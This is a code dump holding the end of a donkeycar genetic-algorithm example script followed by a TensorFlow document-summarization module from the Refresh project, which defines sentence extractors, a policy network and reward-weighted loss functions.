agent = alg.population[0]
print("final score:", agent.score)
pred = agent.model.predict(img_arr)
print("final pred", pred[0][0], pred[1][0])
if __name__ == "__main__":
# Example: python ~\projects\gym-donkeycar\examples\genetic_alg\simple_gen.py
# --model models\lane_keeper.h5 --record data\tub_6_20-05-16\record_2000.json
parser = argparse.ArgumentParser(description="simple_gen")
parser.add_argument("--model", type=str, help=".h5 model produced by donkeycar. expects the default linear model type.")
parser.add_argument("--record", type=str, help="donkey json record to use for training")
parser.add_argument("--num_agents", type=int, default=8, help="how many agents in our population")
parser.add_argument("--num_iter", type=int, default=8, help="how many generations before we stop")
args = parser.parse_args()
# only needed if TF==1.13.1
# config = tf.ConfigProto()
# config.gpu_options.allow_growth = True
# sess = tf.Session(config=config)
# K.set_session(sess)
test_image_agent(
model_filename=args.model, record_filename=args.record, num_agents=args.num_agents, num_iter=args.num_iter
)
|
model_docsum.py
|
EdinburghNLP/Refresh
| 265 |
64378
|
<gh_stars>100-1000
####################################
# Author: <NAME>
# Date: September 2016
# Project: Document Summarization
# H2020 Summa Project
####################################
"""
Document Summarization Modules and Models
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import seq2seq
from tensorflow.python.ops import math_ops
# from tf.nn import variable_scope
from my_flags import FLAGS
from model_utils import *
### Various types of extractor
def sentence_extractor_nonseqrnn_noatt(sents_ext, encoder_state):
"""Implements Sentence Extractor: No attention and non-sequential RNN
Args:
sents_ext: Embedding of sentences to label for extraction
encoder_state: encoder_state
Returns:
extractor output and logits
"""
# Define Variables
weight = variable_on_cpu('weight', [FLAGS.size, FLAGS.target_label_size], tf.random_normal_initializer())
bias = variable_on_cpu('bias', [FLAGS.target_label_size], tf.random_normal_initializer())
# Get RNN output
rnn_extractor_output, _ = simple_rnn(sents_ext, initial_state=encoder_state)
with variable_scope.variable_scope("Reshape-Out"):
rnn_extractor_output = reshape_list2tensor(rnn_extractor_output, FLAGS.max_doc_length, FLAGS.size)
# Get Final logits without softmax
extractor_output_forlogits = tf.reshape(rnn_extractor_output, [-1, FLAGS.size])
logits = tf.matmul(extractor_output_forlogits, weight) + bias
# logits: [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
logits = tf.reshape(logits, [-1, FLAGS.max_doc_length, FLAGS.target_label_size])
return rnn_extractor_output, logits
def sentence_extractor_nonseqrnn_titimgatt(sents_ext, encoder_state, titleimages):
"""Implements Sentence Extractor: Non-sequential RNN with attention over title-images
Args:
sents_ext: Embedding of sentences to label for extraction
encoder_state: encoder_state
titleimages: Embeddings of title and images in the document
Returns:
extractor output and logits
"""
# Define Variables
weight = variable_on_cpu('weight', [FLAGS.size, FLAGS.target_label_size], tf.random_normal_initializer())
bias = variable_on_cpu('bias', [FLAGS.target_label_size], tf.random_normal_initializer())
# Get RNN output
rnn_extractor_output, _ = simple_attentional_rnn(sents_ext, titleimages, initial_state=encoder_state)
with variable_scope.variable_scope("Reshape-Out"):
rnn_extractor_output = reshape_list2tensor(rnn_extractor_output, FLAGS.max_doc_length, FLAGS.size)
# Get Final logits without softmax
extractor_output_forlogits = tf.reshape(rnn_extractor_output, [-1, FLAGS.size])
logits = tf.matmul(extractor_output_forlogits, weight) + bias
# logits: [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
logits = tf.reshape(logits, [-1, FLAGS.max_doc_length, FLAGS.target_label_size])
return rnn_extractor_output, logits
def sentence_extractor_seqrnn_docatt(sents_ext, encoder_outputs, encoder_state, sents_labels):
"""Implements Sentence Extractor: Sequential RNN with attention over sentences during encoding
Args:
sents_ext: Embedding of sentences to label for extraction
encoder_outputs, encoder_state
sents_labels: Gold sent labels for training
Returns:
extractor output and logits
"""
# Define MLP Variables
weights = {
'h1': variable_on_cpu('weight_1', [2*FLAGS.size, FLAGS.size], tf.random_normal_initializer()),
'h2': variable_on_cpu('weight_2', [FLAGS.size, FLAGS.size], tf.random_normal_initializer()),
'out': variable_on_cpu('weight_out', [FLAGS.size, FLAGS.target_label_size], tf.random_normal_initializer())
}
biases = {
'b1': variable_on_cpu('bias_1', [FLAGS.size], tf.random_normal_initializer()),
'b2': variable_on_cpu('bias_2', [FLAGS.size], tf.random_normal_initializer()),
'out': variable_on_cpu('bias_out', [FLAGS.target_label_size], tf.random_normal_initializer())
}
# Shift sents_ext for RNN
with variable_scope.variable_scope("Shift-SentExt"):
# Create embeddings for special symbol (lets assume all 0) and put in the front by shifting by one
special_tensor = tf.zeros_like(sents_ext[0]) # tf.ones_like(sents_ext[0])
sents_ext_shifted = [special_tensor] + sents_ext[:-1]
# Reshape sents_labels for RNN (Only used for cross entropy training)
with variable_scope.variable_scope("Reshape-Label"):
# only used for training
sents_labels = reshape_tensor2list(sents_labels, FLAGS.max_doc_length, FLAGS.target_label_size)
# Define Sequential Decoder
extractor_outputs, logits = jporg_attentional_seqrnn_decoder(sents_ext_shifted, encoder_outputs, encoder_state, sents_labels, weights, biases)
# Final logits without softmax
with variable_scope.variable_scope("Reshape-Out"):
logits = reshape_list2tensor(logits, FLAGS.max_doc_length, FLAGS.target_label_size)
extractor_outputs = reshape_list2tensor(extractor_outputs, FLAGS.max_doc_length, 2*FLAGS.size)
return extractor_outputs, logits
def policy_network(vocab_embed_variable, document_placeholder, label_placeholder):
"""Build the policy core network.
Args:
vocab_embed_variable: [vocab_size, FLAGS.wordembed_size], embeddings without PAD and UNK
document_placeholder: [None,(FLAGS.max_doc_length + FLAGS.max_title_length + FLAGS.max_image_length), FLAGS.max_sent_length]
label_placeholder: Gold label [None, FLAGS.max_doc_length, FLAGS.target_label_size], only used during cross entropy training of JP's model.
Returns:
Outputs of sentence extractor and logits without softmax
"""
with tf.variable_scope('PolicyNetwork') as scope:
### Full Word embedding Lookup Variable
# PADDING embedding non-trainable
pad_embed_variable = variable_on_cpu("pad_embed", [1, FLAGS.wordembed_size], tf.constant_initializer(0), trainable=False)
# UNK embedding trainable
unk_embed_variable = variable_on_cpu("unk_embed", [1, FLAGS.wordembed_size], tf.constant_initializer(0), trainable=True)
# Get fullvocab_embed_variable
fullvocab_embed_variable = tf.concat(0, [pad_embed_variable, unk_embed_variable, vocab_embed_variable])
# print(fullvocab_embed_variable)
### Lookup layer
with tf.variable_scope('Lookup') as scope:
document_placeholder_flat = tf.reshape(document_placeholder, [-1])
document_word_embedding = tf.nn.embedding_lookup(fullvocab_embed_variable, document_placeholder_flat, name="Lookup")
document_word_embedding = tf.reshape(document_word_embedding, [-1, (FLAGS.max_doc_length + FLAGS.max_title_length + FLAGS.max_image_length),
FLAGS.max_sent_length, FLAGS.wordembed_size])
# print(document_word_embedding)
### Convolution Layer
with tf.variable_scope('ConvLayer') as scope:
document_word_embedding = tf.reshape(document_word_embedding, [-1, FLAGS.max_sent_length, FLAGS.wordembed_size])
document_sent_embedding = conv1d_layer_sentence_representation(document_word_embedding) # [None, sentembed_size]
document_sent_embedding = tf.reshape(document_sent_embedding, [-1, (FLAGS.max_doc_length + FLAGS.max_title_length + FLAGS.max_image_length),
FLAGS.sentembed_size])
# print(document_sent_embedding)
### Reshape Tensor to List [-1, (max_doc_length+max_title_length+max_image_length), sentembed_size] -> List of [-1, sentembed_size]
with variable_scope.variable_scope("ReshapeDoc_TensorToList"):
document_sent_embedding = reshape_tensor2list(document_sent_embedding, (FLAGS.max_doc_length + FLAGS.max_title_length + FLAGS.max_image_length), FLAGS.sentembed_size)
# print(document_sent_embedding)
# document_sents_enc
document_sents_enc = document_sent_embedding[:FLAGS.max_doc_length]
if FLAGS.doc_encoder_reverse:
document_sents_enc = document_sents_enc[::-1]
# document_sents_ext
document_sents_ext = document_sent_embedding[:FLAGS.max_doc_length]
# document_sents_titimg
document_sents_titimg = document_sent_embedding[FLAGS.max_doc_length:]
### Document Encoder
with tf.variable_scope('DocEnc') as scope:
encoder_outputs, encoder_state = simple_rnn(document_sents_enc)
### Sentence Label Extractor
with tf.variable_scope('SentExt') as scope:
if (FLAGS.attend_encoder) and (len(document_sents_titimg) != 0):
# Multiple decoder
print("Multiple decoder is not implement yet.")
exit(0)
# # Decoder to attend captions
# attendtitimg_extractor_output, _ = simple_attentional_rnn(document_sents_ext, document_sents_titimg, initial_state=encoder_state)
# # Attend previous decoder
# logits = sentence_extractor_seqrnn_docatt(document_sents_ext, attendtitimg_extractor_output, encoder_state, label_placeholder)
elif (not FLAGS.attend_encoder) and (len(document_sents_titimg) != 0):
# Attend only titimages during decoding
extractor_output, logits = sentence_extractor_nonseqrnn_titimgatt(document_sents_ext, encoder_state, document_sents_titimg)
elif (FLAGS.attend_encoder) and (len(document_sents_titimg) == 0):
# JP model: attend encoder
extractor_outputs, logits = sentence_extractor_seqrnn_docatt(document_sents_ext, encoder_outputs, encoder_state, label_placeholder)
else:
# Attend nothing
extractor_output, logits = sentence_extractor_nonseqrnn_noatt(document_sents_ext, encoder_state)
# print(extractor_output)
# print(logits)
return extractor_output, logits
def baseline_future_reward_estimator(extractor_output):
"""Implements linear regression to estimate future rewards
Args:
extractor_output: [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.size or 2*FLAGS.size]
Output:
rewards: [FLAGS.batch_size, FLAGS.max_doc_length]
"""
with tf.variable_scope('FutureRewardEstimator') as scope:
last_size = extractor_output.get_shape()[2].value
# Define Variables
weight = variable_on_cpu('weight', [last_size, 1], tf.random_normal_initializer())
bias = variable_on_cpu('bias', [1], tf.random_normal_initializer())
extractor_output_forreward = tf.reshape(extractor_output, [-1, last_size])
future_rewards = tf.matmul(extractor_output_forreward, weight) + bias
# future_rewards: [FLAGS.batch_size, FLAGS.max_doc_length, 1]
future_rewards = tf.reshape(future_rewards, [-1, FLAGS.max_doc_length, 1])
future_rewards = tf.squeeze(future_rewards)
return future_rewards
def baseline_single_future_reward_estimator(extractor_output):
"""Implements linear regression to estimate future rewards for whole document
Args:
extractor_output: [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.size or 2*FLAGS.size]
Output:
rewards: [FLAGS.batch_size]
"""
with tf.variable_scope('FutureRewardEstimator') as scope:
last_size = extractor_output.get_shape()[2].value
# Define Variables
weight = variable_on_cpu('weight', [FLAGS.max_doc_length*last_size, 1], tf.random_normal_initializer())
bias = variable_on_cpu('bias', [1], tf.random_normal_initializer())
extractor_output_forreward = tf.reshape(extractor_output, [-1, FLAGS.max_doc_length*last_size]) # [FLAGS.batch_size, FLAGS.max_doc_length*(FLAGS.size or 2*FLAGS.size)]
future_rewards = tf.matmul(extractor_output_forreward, weight) + bias # [FLAGS.batch_size, 1]
# future_rewards: [FLAGS.batch_size, 1]
future_rewards = tf.squeeze(future_rewards) # [FLAGS.batch_size]
return future_rewards
### Loss Functions
def mean_square_loss_doclevel(future_rewards, actual_reward):
"""Implements mean_square_loss for futute reward prediction
args:
future_rewards: [FLAGS.batch_size]
actual_reward: [FLAGS.batch_size]
Output
Float Value
"""
with tf.variable_scope('MeanSquareLoss') as scope:
sq_loss = tf.square(future_rewards - actual_reward) # [FLAGS.batch_size]
mean_sq_loss = tf.reduce_mean(sq_loss)
tf.add_to_collection('mean_square_loss', mean_sq_loss)
return mean_sq_loss
def mean_square_loss(future_rewards, actual_reward, weights):
"""Implements mean_square_loss for futute reward prediction
args:
future_rewards: [FLAGS.batch_size, FLAGS.max_doc_length]
actual_reward: [FLAGS.batch_size]
weights: Weights to avoid padded part [FLAGS.batch_size, FLAGS.max_doc_length]
Output
Float Value
"""
with tf.variable_scope('MeanSquareLoss') as scope:
actual_reward = tf.expand_dims(actual_reward, 1) # [FLAGS.batch_size, 1]
sq_loss = tf.square(future_rewards - actual_reward) # [FLAGS.batch_size, FLAGS.max_doc_length]
mean_sq_loss = 0
if FLAGS.weighted_loss:
sq_loss = tf.mul(sq_loss, weights)
sq_loss_sum = tf.reduce_sum(sq_loss)
valid_sentences = tf.reduce_sum(weights)
mean_sq_loss = sq_loss_sum / valid_sentences
else:
mean_sq_loss = tf.reduce_mean(sq_loss)
tf.add_to_collection('mean_square_loss', mean_sq_loss)
return mean_sq_loss
def cross_entropy_loss(logits, labels, weights):
"""Estimate cost of predictions
Add summary for "cost" and "cost/avg".
Args:
logits: Logits from inference(). [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
labels: Sentence extraction gold levels [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
weights: Weights to avoid padded part [FLAGS.batch_size, FLAGS.max_doc_length]
Returns:
Cross-entropy Cost
"""
with tf.variable_scope('CrossEntropyLoss') as scope:
# Reshape logits and labels to match the requirement of softmax_cross_entropy_with_logits
logits = tf.reshape(logits, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size]
labels = tf.reshape(labels, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size]
cross_entropy = tf.nn.softmax_cross_entropy_with_logits(logits, labels) # [FLAGS.batch_size*FLAGS.max_doc_length]
cross_entropy = tf.reshape(cross_entropy, [-1, FLAGS.max_doc_length]) # [FLAGS.batch_size, FLAGS.max_doc_length]
if FLAGS.weighted_loss:
cross_entropy = tf.mul(cross_entropy, weights)
# Cross entroy / document
cross_entropy = tf.reduce_sum(cross_entropy, reduction_indices=1) # [FLAGS.batch_size]
cross_entropy_mean = tf.reduce_mean(cross_entropy, name='crossentropy')
# ## Cross entroy / sentence
# cross_entropy_sum = tf.reduce_sum(cross_entropy)
# valid_sentences = tf.reduce_sum(weights)
# cross_entropy_mean = cross_entropy_sum / valid_sentences
# cross_entropy = -tf.reduce_sum(labels * tf.log(logits), reduction_indices=1)
# cross_entropy_mean = tf.reduce_mean(cross_entropy, name='crossentropy')
tf.add_to_collection('cross_entropy_loss', cross_entropy_mean)
# # # The total loss is defined as the cross entropy loss plus all of
# # # the weight decay terms (L2 loss).
# # return tf.add_n(tf.get_collection('losses'), name='total_loss')
return cross_entropy_mean
def predict_labels(logits):
""" Predict self labels
logits: Logits from inference(). [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
Return [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
"""
with tf.variable_scope('PredictLabels') as scope:
# Reshape logits for argmax and argmin
logits = tf.reshape(logits, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size]
# Get labels predicted using these logits
logits_argmax = tf.argmax(logits, 1) # [FLAGS.batch_size*FLAGS.max_doc_length]
logits_argmax = tf.reshape(logits_argmax, [-1, FLAGS.max_doc_length]) # [FLAGS.batch_size, FLAGS.max_doc_length]
logits_argmax = tf.expand_dims(logits_argmax, 2) # [FLAGS.batch_size, FLAGS.max_doc_length, 1]
logits_argmin = tf.argmin(logits, 1) # [FLAGS.batch_size*FLAGS.max_doc_length]
logits_argmin = tf.reshape(logits_argmin, [-1, FLAGS.max_doc_length]) # [FLAGS.batch_size, FLAGS.max_doc_length]
logits_argmin = tf.expand_dims(logits_argmin, 2) # [FLAGS.batch_size, FLAGS.max_doc_length, 1]
# Convert argmin and argmax to labels, works only if FLAGS.target_label_size = 2
labels = tf.concat(2, [logits_argmin, logits_argmax]) # [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
dtype = tf.float16 if FLAGS.use_fp16 else tf.float32
labels = tf.cast(labels, dtype)
return labels
def estimate_ltheta_ot(logits, labels, future_rewards, actual_rewards, weights):
"""
Args:
logits: Logits from inference(). [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
labels: Label placeholdr for self prediction [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
future_rewards: [FLAGS.batch_size, FLAGS.max_doc_length]
actual_reward: [FLAGS.batch_size]
weights: Weights to avoid padded part [FLAGS.batch_size, FLAGS.max_doc_length]
Returns:
[FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
"""
with tf.variable_scope('LTheta_Ot') as scope:
# Get Reward Weights: External reward - Predicted reward
actual_rewards = tf.tile(actual_rewards, [FLAGS.max_doc_length]) # [FLAGS.batch_size * FLAGS.max_doc_length] , [a,b] * 3 = [a, b, a, b, a, b]
actual_rewards = tf.reshape(actual_rewards, [FLAGS.max_doc_length, -1]) # [FLAGS.max_doc_length, FLAGS.batch_size], # [[a,b], [a,b], [a,b]]
actual_rewards = tf.transpose(actual_rewards) # [FLAGS.batch_size, FLAGS.max_doc_length] # [[a,a,a], [b,b,b]]
diff_act_pred = actual_rewards - future_rewards # [FLAGS.batch_size, FLAGS.max_doc_length]
diff_act_pred = tf.expand_dims(diff_act_pred, 2) # [FLAGS.batch_size, FLAGS.max_doc_length, 1]
# Convert (FLAGS.target_label_size = 2)
diff_act_pred = tf.concat(2, [diff_act_pred, diff_act_pred]) # [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# Reshape logits and labels to match the requirement of softmax_cross_entropy_with_logits
logits = tf.reshape(logits, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size]
logits = tf.nn.softmax(logits)
logits = tf.reshape(logits, [-1, FLAGS.max_doc_length, FLAGS.target_label_size]) # [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# Get the difference
diff_logits_indicator = logits - labels # [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# Multiply with reward
d_ltheta_ot = tf.mul(diff_act_pred, diff_logits_indicator) # [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# Multiply with weight
weights = tf.expand_dims(weights, 2) # [FLAGS.batch_size, FLAGS.max_doc_length, 1]
weights = tf.concat(2, [weights, weights]) # [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
d_ltheta_ot = tf.mul(d_ltheta_ot, weights) # [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
return d_ltheta_ot
# def estimate_ltheta_ot_mixer(logits, labels_gold, labels_pred, future_rewards, actual_rewards, weights, annealing_step):
# """
# Args:
# logits: Logits from inference(). [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# labels_gold: Label placeholdr for gold labels [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# labels_pred: Label placeholdr for self prediction [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# future_rewards: [FLAGS.batch_size, FLAGS.max_doc_length]
# actual_reward: [FLAGS.batch_size]
# weights: Weights to avoid padded part [FLAGS.batch_size, FLAGS.max_doc_length]
# annealing_step: [1], single value but in tensor form
# Returns:
# [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# """
# with tf.variable_scope('LTheta_Ot_Mixer') as scope:
# print(annealing_step)
# policygradloss_length = tf.reduce_sum(annealing_step) * FLAGS.annealing_step_delta
# crossentryloss_length = FLAGS.max_doc_length - policygradloss_length
# # Reshape logits and partition
# logits = tf.reshape(logits, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size]
# logits = tf.nn.softmax(logits)
# logits = tf.reshape(logits, [-1, FLAGS.max_doc_length, FLAGS.target_label_size]) # [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# logits_list = reshape_tensor2list(logits, FLAGS.max_doc_length, FLAGS.target_label_size)
# logits_ce_gold_list = logits_list[0:crossentryloss_length]
# logits_ce_gold = reshape_list2tensor(logits_ce_gold_list, crossentryloss_length, FLAGS.target_label_size) # [FLAGS.batch_size, crossentryloss_length, FLAGS.target_label_size]
# logits_reward_list = logits_list[crossentryloss_length:]
# logits_reward = reshape_list2tensor(logits_reward_list, policygradloss_length, FLAGS.target_label_size) # [FLAGS.batch_size, policygradloss_length, FLAGS.target_label_size]
# # Crossentropy loss with gold labels: partition gold_labels
# labels_gold_list = reshape_tensor2list(labels_gold, FLAGS.max_doc_length, FLAGS.target_label_size)
# labels_gold_used_list = labels_gold_list[0:crossentryloss_length]
# labels_gold_used = reshape_list2tensor(labels_gold_used_list, crossentryloss_length, FLAGS.target_label_size) # [FLAGS.batch_size, crossentryloss_length, FLAGS.target_label_size]
# # d_ltheta_ot : cross entropy
# diff_logits_goldlabels = logits_ce_gold - labels_gold_used # [FLAGS.batch_size, crossentryloss_length, FLAGS.target_label_size]
# # Policy gradient for rest
# # Get Reward Weights: External reward - Predicted reward
# actual_rewards = tf.tile(actual_rewards, [FLAGS.max_doc_length]) # [FLAGS.batch_size * FLAGS.max_doc_length] , [a,b] * 3 = [a, b, a, b, a, b]
# actual_rewards = tf.reshape(actual_rewards, [FLAGS.max_doc_length, -1]) # [FLAGS.max_doc_length, FLAGS.batch_size], # [[a,b], [a,b], [a,b]]
# actual_rewards = tf.transpose(actual_rewards) # [FLAGS.batch_size, FLAGS.max_doc_length] # [[a,a,a], [b,b,b]]
# diff_act_pred = actual_rewards - future_rewards # [FLAGS.batch_size, FLAGS.max_doc_length]
# diff_act_pred = tf.expand_dims(diff_act_pred, 2) # [FLAGS.batch_size, FLAGS.max_doc_length, 1]
# # Convert (FLAGS.target_label_size = 2)
# diff_act_pred = tf.concat(2, [diff_act_pred, diff_act_pred]) # [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# # Get used reward diff
# diff_act_pred_list = reshape_tensor2list(diff_act_pred, FLAGS.max_doc_length, FLAGS.target_label_size)
# diff_reward_act_pred_used_list = diff_act_pred_list[crossentryloss_length:]
# diff_reward_act_pred_used = reshape_list2tensor(diff_reward_act_pred_used_list, policygradloss_length, FLAGS.target_label_size) # [FLAGS.batch_size, policygradloss_length, FLAGS.target_label_size]
# # Partition predicted labels
# labels_pred_list = reshape_tensor2list(labels_pred, FLAGS.max_doc_length, FLAGS.target_label_size)
# labels_pred_used_list = labels_pred_list[crossentryloss_length:]
# labels_pred_used = reshape_list2tensor(labels_pred_used_list, policygradloss_length, FLAGS.target_label_size) # [FLAGS.batch_size, policygradloss_length, FLAGS.target_label_size]
# # d_ltheta_ot : reward weighted
# diff_logits_predlabels = logits_reward - labels_pred_used # [FLAGS.batch_size, policygradloss_length, FLAGS.target_label_size]
# # Multiply with reward
# reward_weighted_diff_logits_predlabels = tf.mul(diff_reward_act_pred_used, diff_logits_predlabels) # [FLAGS.batch_size, policygradloss_length, FLAGS.target_label_size]
# # Concat both part
# d_ltheta_ot_mixer = tf.concat(1, [diff_logits_goldlabels, reward_weighted_diff_logits_predlabels]) # [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# # Multiply with weight
# weights = tf.expand_dims(weights, 2) # [FLAGS.batch_size, FLAGS.max_doc_length, 1]
# weights = tf.concat(2, [weights, weights]) # [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# d_ltheta_ot_mixer = tf.mul(d_ltheta_ot_mixer, weights) # [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# return d_ltheta_ot_mixer
def reward_weighted_cross_entropy_loss_multisample(logits, labels, actual_rewards, weights):
"""Estimate cost of predictions
Add summary for "cost" and "cost/avg".
Args:
logits: Logits from inference(). [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
labels: Label placeholdr for multiple sampled prediction [FLAGS.batch_size, 1, FLAGS.max_doc_length, FLAGS.target_label_size]
actual_rewards: [FLAGS.batch_size, 1]
weights: Weights to avoid padded part [FLAGS.batch_size, FLAGS.max_doc_length]
Returns:
Cross-entropy Cost
"""
with tf.variable_scope('RWCELossMultiSample') as scope:
# Expand logits and weights for roll outs
logits_temp = tf.expand_dims(logits, 1) # [FLAGS.batch_size, 1, FLAGS.max_doc_length, FLAGS.target_label_size]
weights_temp = tf.expand_dims(weights, 1) # [FLAGS.batch_size, 1, FLAGS.max_doc_length]
logits_expanded = logits_temp
weights_expanded = weights_temp
# for ridx in range(1,FLAGS.num_sample_rollout):
# logits_expanded = tf.concat(1, [logits_expanded, logits_temp]) # [FLAGS.batch_size, n++, FLAGS.max_doc_length, FLAGS.target_label_size]
# weights_expanded = tf.concat(1, [weights_expanded, weights_temp]) # [FLAGS.batch_size, n++, FLAGS.max_doc_length]
# Reshape logits and labels to match the requirement of softmax_cross_entropy_with_logits
logits_expanded = tf.reshape(logits_expanded, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*1*FLAGS.max_doc_length, FLAGS.target_label_size]
labels = tf.reshape(labels, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*1*FLAGS.max_doc_length, FLAGS.target_label_size]
cross_entropy = tf.nn.softmax_cross_entropy_with_logits(logits_expanded, labels) # [FLAGS.batch_size*1*FLAGS.max_doc_length]
cross_entropy = tf.reshape(cross_entropy, [-1, 1, FLAGS.max_doc_length]) # [FLAGS.batch_size, 1, FLAGS.max_doc_length]
if FLAGS.weighted_loss:
cross_entropy = tf.mul(cross_entropy, weights_expanded) # [FLAGS.batch_size, 1, FLAGS.max_doc_length]
# Reshape actual rewards
actual_rewards = tf.reshape(actual_rewards, [-1]) # [FLAGS.batch_size*1]
# [[a, b], [c, d], [e, f]] 3x2 => [a, b, c, d, e, f] [6]
actual_rewards = tf.tile(actual_rewards, [FLAGS.max_doc_length]) # [FLAGS.batch_size * 1 * FLAGS.max_doc_length]
# [a, b, c, d, e, f] * 2 = [a, b, c, d, e, f, a, b, c, d, e, f] [12]
actual_rewards = tf.reshape(actual_rewards, [FLAGS.max_doc_length, -1]) # [FLAGS.max_doc_length, FLAGS.batch_size*1]
# [[a, b, c, d, e, f], [a, b, c, d, e, f]] [2, 6]
actual_rewards = tf.transpose(actual_rewards) # [FLAGS.batch_size*1, FLAGS.max_doc_length]
# [[a,a], [b,b], [c,c], [d,d], [e,e], [f,f]] [6 x 2]
actual_rewards = tf.reshape(actual_rewards, [-1, 1, FLAGS.max_doc_length]) # [FLAGS.batch_size, 1, FLAGS.max_doc_length],
# [[[a,a], [b,b]], [[c,c], [d,d]], [[e,e], [f,f]]] [3 x 2 x 2]
# Multiply with reward
reward_weighted_cross_entropy = tf.mul(cross_entropy, actual_rewards) # [FLAGS.batch_size, 1, FLAGS.max_doc_length]
# Cross entroy / sample / document
reward_weighted_cross_entropy = tf.reduce_sum(reward_weighted_cross_entropy, reduction_indices=2) # [FLAGS.batch_size, 1]
reward_weighted_cross_entropy_mean = tf.reduce_mean(reward_weighted_cross_entropy, name='rewardweightedcemultisample')
tf.add_to_collection('reward_cross_entropy_loss_multisample', reward_weighted_cross_entropy_mean)
return reward_weighted_cross_entropy_mean
def reward_weighted_cross_entropy_loss(logits, labels, actual_rewards, weights):
"""Estimate cost of predictions
Add summary for "cost" and "cost/avg".
Args:
logits: Logits from inference(). [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
labels: Label placeholdr for self prediction [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
actual_reward: [FLAGS.batch_size]
weights: Weights to avoid padded part [FLAGS.batch_size, FLAGS.max_doc_length]
Returns:
Cross-entropy Cost
"""
with tf.variable_scope('RewardWeightedCrossEntropyLoss') as scope:
# Reshape logits and labels to match the requirement of softmax_cross_entropy_with_logits
logits = tf.reshape(logits, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size]
labels = tf.reshape(labels, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size]
cross_entropy = tf.nn.softmax_cross_entropy_with_logits(logits, labels) # [FLAGS.batch_size*FLAGS.max_doc_length]
cross_entropy = tf.reshape(cross_entropy, [-1, FLAGS.max_doc_length]) # [FLAGS.batch_size, FLAGS.max_doc_length]
if FLAGS.weighted_loss:
cross_entropy = tf.mul(cross_entropy, weights) # [FLAGS.batch_size, FLAGS.max_doc_length]
# Reshape actual rewards
actual_rewards = tf.tile(actual_rewards, [FLAGS.max_doc_length]) # [FLAGS.batch_size * FLAGS.max_doc_length] , [a,b] * 3 = [a, b, a, b, a, b]
actual_rewards = tf.reshape(actual_rewards, [FLAGS.max_doc_length, -1]) # [FLAGS.max_doc_length, FLAGS.batch_size], # [[a,b], [a,b], [a,b]]
actual_rewards = tf.transpose(actual_rewards) # [FLAGS.batch_size, FLAGS.max_doc_length] # [[a,a,a], [b,b,b]]
# Multiply with reward
reward_weighted_cross_entropy = tf.mul(cross_entropy, actual_rewards) # [FLAGS.batch_size, FLAGS.max_doc_length]
# Cross entroy / document
reward_weighted_cross_entropy = tf.reduce_sum(reward_weighted_cross_entropy, reduction_indices=1) # [FLAGS.batch_size]
reward_weighted_cross_entropy_mean = tf.reduce_mean(reward_weighted_cross_entropy, name='rewardweightedcrossentropy')
tf.add_to_collection('reward_cross_entropy_loss', reward_weighted_cross_entropy_mean)
return reward_weighted_cross_entropy_mean
# def reward_weighted_cross_entropy_loss(logits, labels, future_rewards, actual_rewards, weights):
# """Estimate cost of predictions
# Add summary for "cost" and "cost/avg".
# Args:
# logits: Logits from inference(). [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# labels: Label placeholdr for self prediction [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# future_rewards: [FLAGS.batch_size, FLAGS.max_doc_length]
# actual_reward: [FLAGS.batch_size]
# weights: Weights to avoid padded part [FLAGS.batch_size, FLAGS.max_doc_length]
# Returns:
# Cross-entropy Cost
# """
# with tf.variable_scope('RewardWeightedCrossEntropyLoss') as scope:
# # Get Reward Weights: External reward - Predicted reward
